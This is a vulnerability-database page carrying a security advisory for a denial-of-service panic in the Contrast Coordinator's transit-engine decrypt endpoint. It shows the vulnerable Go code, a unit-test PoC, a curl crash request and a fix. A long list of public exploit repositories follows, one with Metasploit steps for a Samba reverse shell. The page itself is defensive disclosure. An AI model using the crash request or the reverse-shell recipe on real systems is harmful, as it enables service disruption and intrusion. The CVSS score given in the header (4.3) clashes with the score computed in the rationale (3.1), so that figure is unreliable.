GHSA-3ccm-4qq2-5wrpMEDIUMCVSS 4.3

Constrata's coordinator transit engine `ciphertextContainer.UnmarshalJSON` panics on attacker-controlled short ciphertexts

Published Jul 1, 2026·Updated Jul 1, 2026

Description

## Summary `ciphertextContainer.UnmarshalJSON` decodes the third `:`-separated component of a `vault:vX:base64...` ciphertext and then unconditionally takes a 12-byte prefix slice for the AES-GCM nonce: `c.nonce = fullCiphertext[:aesGCMNonceSize]`. If the decoded blob is shorter than 12 bytes, the slice expression panics. The panic happens before any cryptographic operation, while the JSON body of the request is still being parsed inside the request handler. Because the handler is invoked from `net/http`'s standard handler goroutine, the panic is recovered to a 500 response, but the request handler aborts mid-execution and the recovered panic appears in the Coordinator's logs. An authenticated workload that holds a valid mesh certificate for any `WorkloadSecretID` can trigger the panic at will, producing log spam, request-failure metrics, and a slow but cheap denial of service against the transit-engine endpoint. ## Details ### the panicking slice `coordinator/internal/transitengineapi/crypto.go:64-88`: ```go // UnmarshalJSON umarshalls a json string to a ciphertextContainer holding the version prefix, // decoded base64 nonce and ciphertext. func (c *ciphertextContainer) UnmarshalJSON(data []byte) error { var encoded string if err := json.Unmarshal(data, &encoded); err != nil { return err } // Split "vault:vX:base64" format parts := strings.SplitN(encoded, ":", 3) if len(parts) < 3 { return fmt.Errorf("invalid ciphertext format") } version, err := extractVersion(parts[1]) if err != nil { return fmt.Errorf("ciphertext version: %w", err) } c.keyVersion = version fullCiphertext, err := base64.StdEncoding.DecodeString(parts[2]) if err != nil { return fmt.Errorf("decoding ciphertext: %w", err) } c.nonce = fullCiphertext[:aesGCMNonceSize] // PANIC when len(fullCiphertext) < 12 c.ciphertext = fullCiphertext[aesGCMNonceSize:] return nil } ``` `aesGCMNonceSize = 12` (defined at line 33). There is no length check on `fullCiphertext`. If `parts[2]` decodes to fewer than 12 bytes (which happens for any base64 string shorter than ~16 characters), the slice expression `fullCiphertext[:aesGCMNonceSize]` triggers Go's runtime panic `runtime error: slice bounds out of range [:12] with length N`. `UnmarshalJSON` is reached from `parseRequest`: ```go // coordinator/internal/transitengineapi/transitengineapi.go:292-302 func parseRequest(r *http.Request, into any) error { defer r.Body.Close() if err := validateContentType(r); err != nil { return err } if err := json.NewDecoder(r.Body).Decode(into); err != nil { return err } return nil } ``` which is called inside `getDecryptHandler` (line 178-237) before any other processing. ### auth requirement is real but trivial to satisfy for any registered workload The transit-engine HTTP server (`transitengineapi.go:74-100`) configures `tls.RequireAndVerifyClientCert` with the Coordinator's mesh CA pool. The handler is wrapped by `authorizationMiddleware` (line 348-357) which calls `authorizeWorkloadSecret` (line 241-254). That function reads the `WorkloadSecretOID` extension from the peer cert and requires it to match the URL path's `{name}` segment. Any workload that has gone through the normal initializer / meshapi flow (`coordinator/internal/meshapi/meshapi.go:71-119`) and has a non-empty `WorkloadSecretID` in its `PolicyEntry` is issued a mesh cert with the matching extension, so the path-name authorisation is automatically satisfied for whichever `workloadSecretID` the manifest assigned to that workload. There is no rate limiting, no proof-of-work, and no audit log on triggering the panic. ### what happens after the panic `net/http` wraps each handler in a recovered goroutine, so the panic does not crash the Coordinator process. Instead: 1. The Go runtime captures the panic, logs `http: panic serving <peer>: runtime error: slice bounds out of range` to stderr together with a goroutine stack trace. 2. The connection is hung up without a response body (`http.Server.serve` calls `c.close()` in the recovery path). 3. The grpc-prometheus / handler metrics (registered via `promRegistry`) record the request as failed. 4. The recovered panic appears in the Coordinator's logs / journald, creating noise that an operator monitoring a real attack would have to filter out. A workload that wants to amplify the impact can: * Loop the request to fill the journal with stack traces (cheap operation per request, expensive log volume). * Combine with a second valid workload identity to bypass any per-cert rate limiting added later. * Use the panic stack trace (which contains internal source paths) as a fingerprint to determine the exact Coordinator version in lieu of a `/version` endpoint. The panic also avoids returning a JSON error body to the caller, so callers that depend on a structured error are forced into a less informative failure mode (HTTP-level connection close). ## PoC The bug is deterministic. Drop the following test into `coordinator/internal/transitengineapi/crypto_test.go`: ```go func TestCiphertextContainer_UnmarshalJSON_ShortBlobPanics(t *testing.T) { // "AAAA" base64-decodes to 3 bytes, well under aesGCMNonceSize=12. body := []byte(`"vault:v1:AAAA"`) defer func() { if r := recover(); r == nil { t.Fatalf("expected panic, got nil") } }() var c ciphertextContainer _ = c.UnmarshalJSON(body) // panics: slice bounds out of range [:12] with length 3 } ``` End-to-end against a running Coordinator (omitted for static review; would require a Contrast cluster and a mesh-certificate-holding workload): ```bash $ curl -k --cert workload.crt --key workload.key \ -H 'Content-Type: application/json' \ -d '{"ciphertext":"vault:v1:AAAA","associated_data":""}' \ https://coordinator:8200/v1/transit/decrypt/<my-workload-secret-id> # Connection: closed without HTTP response body. # Coordinator log: # http: panic serving 10.0.0.5:54321: runtime error: slice bounds out of range [:12] with length 3 # goroutine 4711 [running]: # net/http.(*conn).serve.func1(...) # net/http/server.go:1883 +0xb0 # panic({0x...?, 0x...?}) # runtime/panic.go:770 +0x132 # github.com/edgelesssys/contrast/coordinator/internal/transitengineapi.(*ciphertextContainer).UnmarshalJSON(...) # coordinator/internal/transitengineapi/crypto.go:85 +0x... ``` ## Impact * **Soft denial of service** against the transit-engine endpoint per workload identity. The Coordinator process survives because of `net/http`'s panic recovery, but each panicked request consumes CPU for the recovery / stack dump and floods the operator's logs. * **Information disclosure via stack trace** in the Coordinator log. The trace pins the Coordinator binary version, the build path of the `transitengineapi` package, and exact line numbers of internal source. This is a low-grade fingerprint, but it is leaked even to operators who would normally only see the binary version through controlled means. * **Loss of structured error reporting**: legitimate decrypt requests sharing the panicked log lines may be harder to attribute, and the API consumer sees a connection-close instead of a 4xx response, masking the cause. CVSS rationale: `AV:N`, `AC:L`, `PR:L` (any workload with a transit-engine permission can do this), `UI:N`, `S:U`, `C:N` / `I:N` / `A:L` (low availability impact: log noise + per-request CPU cost; no full DoS because Go's HTTP panic recovery keeps the process up). Score `3.1`. ## Recommended Fix Validate the decoded length before slicing. The minimal change at `coordinator/internal/transitengineapi/crypto.go:81-87`: ```go fullCiphertext, err := base64.StdEncoding.DecodeString(parts[2]) if err != nil { return fmt.Errorf("decoding ciphertext: %w", err) } if len(fullCiphertext) < aesGCMNonceSize { return fmt.Errorf("ciphertext is too short: got %d bytes, expected at least %d for the nonce", len(fullCiphertext), aesGCMNonceSize) } c.nonce = fullCiphertext[:aesGCMNonceSize] c.ciphertext = fullCiphertext[aesGCMNonceSize:] return nil ``` A defence-in-depth tightening would also reject ciphertexts with `len(fullCiphertext) <= aesGCMNonceSize` (which would yield an empty actual ciphertext that AES-GCM open would later reject anyway, but a sharper boundary fails earlier with a clearer error). Add a unit test along the lines of the PoC that asserts a clean error rather than a panic.

Affected Packages (1)

github.com/edgelesssys/contrastGO
Fixed in = 1.20.0

Public Exploits & PoCs100 found

PoC: CVE-2026-6307

Google Chrome CVE-2026-6307 PoC

3

PoC: root-sonim-xp3800

app that ports CVE-2019-2215 to arm32 and mounts a su binary to /sbin with denylist + root app installer. firehose/Magisk guide included

2

PoC: CVE-2026-34835-Black-box-Analysis

A black-box (DAST) security analysis of CVE-2026-34835 focusing on external validation methodology, observable behavior, security impact, and defensive recommendations.

1

PoC: Linux-Kernel-Vulnerabilities-CVE-2026-23111

High Severity LPE vulnerability in Linux Kernel, with a CVS score of 7.8. An inverted check from user enables a process inside the container to break out of the sandbox along with full root privileges on user PC. I have been investigating about this vulnerability and has a lightweight script that runs in the terminal to check if you are vulnerable.

1

PoC: xperia_5_bl_unlocker_poc

My take on unlocking Xperia 5 SO-01M for p42 bootloader using CVE-2021-1931

1

PoC: cve-2026-23111-poc

scuffed PoC for CVE-2026-23111. Made and ran on Linux Kernel 6.12.69

1

PoC: CVE_ADC_IOC_2026

Citrix NetScaler CVE Preconditions Checker as per CTX696604 | Supported CVE : CVE-2026-8451, CVE-2026-8452, CVE-2026-8655, CVE-2026-10816, CVE-2026-10817, and CVE-2026-13474

1

PoC: CVE-2026-46300

CVE-2026-43284 - CVE-2026-43500 - CVE-2026-46300 Variant of dirtyfrag exploit

1

PoC: CVE-2025-69212-PoC

OpenSTAManager v2.9.8 and earlier versions contain a critical OS Command Injection vulnerability in the P7M (signed XML) file decoding function.

1

PoC: CVE-2026-24418

OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module.

1

PoC: CVE-2026-69212

Python poc, exploit for CVE-2025-69212

1

PoC: CVE-2026-49468-LiteLLM-Auth-Bypass

CVE-2026-49468 — LiteLLM (<1.84.0) unauthenticated auth bypass via Host-header route confusion. PoC + docker lab.

PoC: CVE-2026-28995

# CVE-2026-28995 Proof of Concept for CVE-2026-28995 — Path Traversal vulnerability in App Intents on iOS 26.4.2 and below.

PoC: Advanced-CVE-2026-53753

Crawl4AI is an open-source LLM friendly web crawler & scraper. Prior to 0.8.7, the _safe_eval_expression() function in the computed fields feature uses an AST validator that only blocks attributes starting with underscore.

PoC: opensource_defect_repare_cc

Redis 7.0.0 核心模块重构与漏洞修复交付(重构 sds/adlist/intset/listpack,相似度≤20%;修复 CVE-2023-25155/28856、CVE-2024-31449、CVE-2022-36021、CVE-2022-31144 等漏洞)

PoC: opensource_defect_repair_cc

Redis 7.0.0 核心模块重构与漏洞修复交付(重构 sds/adlist/intset/listpack,相似度≤20%;修复 CVE-2023-25155/28856、CVE-2024-31449、CVE-2022-36021、CVE-2022-31144 等漏洞)

PoC: CVE-2026-56782

Gorse < 0.5.10 contains an authentication bypass caused by empty admin_api_key in /api/dump and /api/restore endpoints, letting unauthenticated remote attackers access and modify protected data, exploit requires default empty admin_api_key configuration.

PoC: CVE-2026-54477

CVE-2026-54477: Admin Panel Missing Security Headers (clickjacking/XSS) - Gardyn (ICSA-26-183-03)

PoC: CVE-2026-55726

CVE-2026-55726: Publicly Listable Azure Blob Storage Container (device logs) - Gardyn (ICSA-26-183-03)

PoC: CVE-2026-52217-VTEX-Checkout-CrossTenant-IDOR

The VTEX Checkout Service exposes OrderForm data through the endpoints `/api/checkout/pub/orderForm/{orderFormId}` and `/attachments/*`. These endpoints do not validate the tenant (store account) of the authenticated session against the ownership of the requested OrderForm.

PoC: CVE-2026-13768

CVE-2026-13768: Privileged iothubowner IoT Hub credential — fleet enumeration, device RCE, home-network pivot — Gardyn (ICSA-26-183-03)

PoC: Code-27-Companion-Hub-Exploits

Proof of concept for CVE-2026-36027 and CVE-2026-36028

PoC: CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

This repository contains a proof-of-concept (PoC) exploit for CVE-2026-38751, affecting OpenSTAManager ≤ 2.10. The vulnerability allows an authenticated attacker to upload a malicious module via the module update functionality, leading to arbitrary file upload and remote code execution (RCE).

PoC: CVE-2025-57819

CVE-2025-57819 - FreePBX Unauthenticated Remote Code Execution (RCE)

PoC: CVE-2026-48558

SimpleHelp OIDC Authentication Bypass PoC

PoC: Vulnerability-scanner

DESIGN AND IMPLEMENTATION OF A VULNERABILITY SCANNER FOR CVE-2026-45498 IN MICROSOFT DEFENDER

PoC: CVE-2026-33017

Python POC, Exploit for CVE-2026-33017

PoC: CVE-2021-27877-PoC

A modified version of the Rapid7 Metasploit module for CVE-2021-27877 that supports direct command execution for reliable vulnerability validation. Includes documentation explaining the exploit workflow, the module modifications, and usage examples.

PoC: CVE-2026-30784-rustdesk-poc

CVE-2026-30784: RustDesk hbbs Traffic Amplification PoC & PCAP Analysis

PoC: CVE-2026-52813

Gogs has Path Traversal in organization name that results in RCE through Git hooks

PoC: CVE-2026-53753

Crawl4AI <= 0.8.6 pre-auth RCE via AST sandbox escape (gi_frame.f_back.f_builtins chain) — CVSS 10.0

PoC: CVE-2025-69212

CVE-2025-69212 Proof-of-concept.

PoC: OpenSTAManager_RCE_Exploit-CVE-2026-38751-

OpenSTAManager RCE Exploit (CVE-2026-38751)

PoC: CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager OS Command Injection PoC

PoC: F5-BIG-IP

O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-2020-5902 é uma vulnerabilidade crítica no TMUI que, em versões não corrigidas, pode permitir acesso não autorizado e execução remota de código, reforçando a necessidade de atualização e gestão contínua de vulnerabilidades.

PoC: CVE-2026-6307-Longinus

CVE-2026-6307 PoC: Longinus - 2 Boundaries in One Bug https://nebusec.ai/research/v8-cve-2026-6307-writeup/)

PoC: CVE-2026-48907

CVE-2026-48907 PoC

PoC: CVE-2026-43735

Safari 跨域信息读取

PoC: cve-2025-24054-lab

Blue-team lab: detecting & mitigating CVE-2025-24054 (Windows NTLM hash disclosure) with Sysmon, Wazuh SIEM, and Group Policy

PoC: CVE-2026-42945

A flaw was found in NGINX, specifically within the ngx_http_rewrite_module. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests under specific rewrite configurations. This can lead to a heap buffer overflow in the NGINX worker process, which may result in arbitrary code execution

PoC: CVE-2026-51947-Advisory

Pivotal CRM's patch for an initial deserialization vulnerability was incomplete. The fix switched from BinaryFormatter to JSON.NET but left TypeNameHandling set to 4 without implementing SerializationBinder, allowing attackers to execute arbitrary code through malicious $type payloads. Fixed in 6.6.5.10 and Patch_CWE502_20260316.zip

PoC: CVE-2026-46331

pedit COW

PoC: Incident-Response-Report-TeamCity-Compromise-CVE-2024-27198-

CyberDefenders JetBrains Lab

PoC: CVE-2026-55488

motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read

PoC: CVE-2026-58138-Conductor-Unauth-RCE

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator (HostAccess.ALL). Lab + PoC, verified e2e (root).

PoC: CVE-2026-46490-samlify-SAML-Attribute-Injection

CVE-2026-46490 — samlify <2.13.0 SAML AttributeValue XML injection -> signed-assertion privilege escalation. Self-contained PoC, verified e2e.

PoC: CVE-2025-40271

CVE-2025-40271 Modifed By MadEploits

PoC: cve-2026-46331-pedit-cow-auditd-detection

Defensive validation of CVE-2026-46331 / pedit COW with auditd, AppArmor, mitigation comparison and detection logic.

PoC: cve-2015-1187-dir820l-reproduction

Independent reverse engineering and reproduction of CVE-2015-1187, an unauthenticated command injection in the D-Link DIR-820L (Rev A, v1.05B03). MIPS firmware extraction with binwalk, static analysis in Ghidra, and tracing the `ping_addr` parameter to its command-execution sink.

PoC: CVE-2012-1823

CVE-2012-1823 - PHP CGI Argument Injection Remote Code Execution (RCE)

PoC: CVE-2026-22557-Path-Traversal-Ubiquti-UniFi

CVE-2026-22557 Path Traversal Ubiquti UniFi Network Application

PoC: CVE-2026-48907

POC for CVE-2026-48907

PoC: CVE-2026-49869

Kestra Auth-Bypass Vulnerability Checker

PoC: CVE-2026-31694-POC

Linux kernel FUSE readdir cache out-of-bounds write (CVE-2026-31694): a malicious FUSE server overflows a page-cache page by 24 bytes. PoC plus an unprivileged local-root exploit via /etc/passwd page-cache corruption. Run only inside a VM.

PoC: IS

Ovaj sto se skida isto ovaj s metasplotiom kucas msf console pa onda search CVE-2017-7494 pa use exploit/linux/samba/is_known_pipeline pa show options pa set RHOSTS (ip servera) set RPORt 445 (port za tu ranjivist) SET payload linux/x86/meterpreter/reverse_tcp SET LHOST ip kalija SET LORT 4444 pa exploit i ako je ranjiv dobijemo sesiju

PoC: CVE-2026-46331

Chequeo y Fix de la vulnerabilidad "pedit COW"

PoC: CVE-2025-45422---Bbox

CVE-2025-45422: Proximus b-box UPnP Persistence & Access Control Bypass

PoC: CVE-2026-10580

PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover

PoC: CVE-2026-56121-Feast-Unauth-RCE

CVE-2026-56121 — Feast <0.63.0 unauthenticated RCE via gRPC registry dill.loads of OnDemandFeatureView UDF (pre-auth). Lab + PoC, verified e2e.

PoC: CVE-2026-46817

CVE-2026-46817 - Draft

PoC: CVE-2026-8037

CVE-2026-8037 - Draft

PoC: CVE-2026-27626-PoC

OliveTin is a self-hosted web UI for exposing predefined shell commands to end users. This repository contains a proof-of-concept demonstrating two independent OS command injection vectors in OliveTin's Shell mode execution path, both of which bypass the application's intended shell-argument safety checks.

PoC: cve-2024-31317

Detailed discussion of Zygote vulnerability CVE-2024-31317

PoC: CVE-2026-43700

https://support.apple.com/en-us/127685#:~:text=2026%2D43704%3A%20dr3dd-,WebKit,-Available%20for%3A%20macOS

PoC: CVE-2026-44789-n8n-PrototypePollution-RCE

CVE-2026-44789 — n8n <1.123.43 HTTP Request pagination prototype pollution to RCE (NODE_OPTIONS runner-spawn gadget). Lab + automated PoC, verified e2e.

PoC: CVE-2023-43364-Searchor-RCE-Exploit

POC exploit via unsafe `eval()` usage in Searchor (≤ 2.4.2)

PoC: CVE-2026-46817

CVE-2026-46817

PoC: cve-2026-46331-audit

cve-2026-46331-audit script

PoC: CVE-2026-56782-Gorse-Auth-Bypass

CVE-2026-56782 — Gorse <0.5.10 unauthenticated DB dump/restore (admin_api_key fail-open). Lab + PoC, verified e2e.

PoC: cve-2026-0000-reference

NIST CVE-2026-0000 Keylogger Analysis

PoC: CVE-2026-48907

CVE-2026-48907 – Joomla JCE Unauthenticated Remote Code Execution (RCE)

PoC: CVE-2026-53753-Crawl4AI-RCE

CVE-2026-53753 — Crawl4AI <0.8.7 unauthenticated RCE (AST sandbox escape via gi_frame.f_back). Lab + PoC, verified e2e.

PoC: cve-2023-4911-exploit-optimized

Pure C exploit for CVE-2023-4911 (Looney Tunables). No Python required. Features multi-processing brute-forcing, dynamic calibration, and integrated ELF parser.

PoC: CVE_2024_1086_vulnerability_check

CVE-2024-1086 vulnerability

PoC: CVE-2026-43503

DirtyClone - local privilege escalation (LPE) proof-of-concept targeting a kernel/XFRM-related vulnerability described in the source as CVE-2026-43503

PoC: cve-2026-9082-drupal

drupal-postgresql-rce

PoC: graylog-cve-2024-24824-exploit

Proof-of-concept exploit for CVE-2024-24824 demonstrating how an arbitrary class loading primitive can be transformed into remote code execution on vulnerable Graylog deployments.

PoC: CVE-2026-55200

CVE-2026-55200 - Critical libssh2 Remote Code Execution Vulnerability

PoC: By-Poloss..-..CVE-2026-48939

iCagenda Unauthenticated File Upload to RCE

PoC: cve-2025-0133

CVE-2025-0133 Scanner | Palo Alto GlobalProtect XSS Checker

PoC: CVE-2026-22226

Proof of Concept for the CVE-2026-22226

PoC: CVE-2026-20253

POC for CVE-2026-20253

PoC: Joomla_CVE_2026_48907

cve-2026-48907 scanner

PoC: DirtyClone

Python Proof of Concept for DirtyClone (CVE-2026-43503) - Linux kernel LPE via page-cache corruption

PoC: WiseDelete

Windows utility that demonstrates user-mode interaction with the vulnerable WiseDelfile64.sys driver and uses CVE-2025-66680 to perform kernel-assisted file deletion.

PoC: CVE-2025-55182-React2Shell-RCE

React2Shell (CVE-2025-55182) PoC

PoC: CVE-2026-48908

Unauthenticated RCE PoC for CVE-2026-48908 SP Page Builder (Joomla) arbitrary file upload and remote code execution exploit with mass scaning support.

PoC: WiseDelete

A lightweight Windows utility demonstrating user-mode interaction with the vulnerable WiseDelfile64.sys driver using CVE-2025-66680 to perform kernel-assisted file deletion.

PoC: CVE-2026-23918-Double-free-Apache-httpd-mod_http2

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE

PoC: CVE-2018-18778

CVE-2018-18778 - ACME mini_httpd Arbitrary File Read

PoC: CVE-2023-0386-OverlayFS

Copy fake in-memory files to disk using overlayFS

PoC: CVE-2026-49048-JoomCCK-SQLi

CVE-2026-49048 — JoomCCK 6.4.0 Unauthenticated SQL Injection (CVSS 9.8)

PoC: crypto-lab-merkle-proofs

Browser-based Merkle tree demo — build a tree, generate inclusion proofs, recompute the root hash by hash, and replay the RFC 6962 second-preimage and CVE-2012-2459 attacks. Real SHA-256. No backend.

PoC: react2shell-exploit

React2Shell: CVE-2025-55182

PoC: CVE-2026-12485

CVE-2026-12485

PoC: DevHub-HTB-Walkthrough

Hack The Box - DevHub Machine Walkthrough (Medium Linux, CVE-2026-23744, Chisel Tunneling, Jupyter, Root Privilege Escalation)

PoC: CVE-2026-41179

POC for CVE-2026-41179

PoC: dirtyclone-exploit

CVE-2026-46331 — Linux Kernel Local Privilege Escalation TC pedit + IPsec TEE Page Cache Corruption · Affected kernels: ≤ 6.12.9

PoC: CVE-2026-27654

Обзор n-day уязвимости на русском языке.

PoC: CVE-2026-41940-PoC

CVE-2026-41940 authentication bypass vulnerability proof-of-concept

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

References

View on NVD Search GitHub Search Google

Get alerted for CVEs like this

Register your stack and get notified within minutes when a matching CVE drops.

Start monitoring free